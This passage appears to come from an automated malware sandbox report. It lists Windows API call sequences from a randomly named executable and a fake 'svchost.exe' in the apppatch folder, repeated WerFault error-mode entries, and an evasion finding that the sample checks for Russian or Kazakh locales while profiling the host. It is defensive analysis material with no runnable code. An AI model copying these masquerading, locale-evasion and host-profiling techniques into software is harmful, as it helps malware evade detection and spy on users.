    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0255CFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0255CFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0255CD50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0255CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0255CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0255CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 6_2_0255CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0255CDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CD300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,8_2_025CD300
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025C9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,8_2_025C9ED0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_025CCFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_025CCFE9
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,8_2_025CCD50
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_025CCDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_025CCDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_025CCDC0
    Source: C:\Program Files (x86)\XZPYowZSGESZivoLxJIJUOSkmQvKzAAGTWnYSJPItMFe\cUKxeliGgCix.exeCode function: 8_2_025CCDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_025CCDC0
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02CA5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,1_2_02CA5720
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Contains functionality to behave differently if execute on a Russian/Kazak computer
    Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02C94B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteF